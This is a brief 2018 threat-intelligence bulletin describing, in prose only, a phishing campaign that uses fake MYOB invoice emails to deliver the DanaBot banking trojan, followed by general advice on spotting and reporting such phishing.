DanaBot Riding Fake MYOB Invoice Emails


DanaBot Riding Fake MYOB Invoice Emails (Jul 16, 2018)

A phishing campaign has been discovered impersonating the Australian software company “MYOB” (Mind Your Own Business). The emails purported to be from MYOB that claim that the recipient has a payment due and asks the recipient to “View Invoice.” If the View Invoice button is clicked, a zip archive is pulled down from what researcher believe to be a compromised FTP server of an unnamed Australian company. The zip archive contains a JavaScript downloader that requires the user to double-click to execute it. If executed, the JavaScript will launch a PowerShell command that would download the “DanaBot” malware. DanaBot is a banking trojan that was first discovered in May 2018 that focuses on stealing banking credentials that can be monetized in the future.

Recommendation: Financially themed phishing emails are a common tactic among threat actors, therefore, it is crucial that your employees are aware of their financial institution’s policies regarding electron communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.

Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.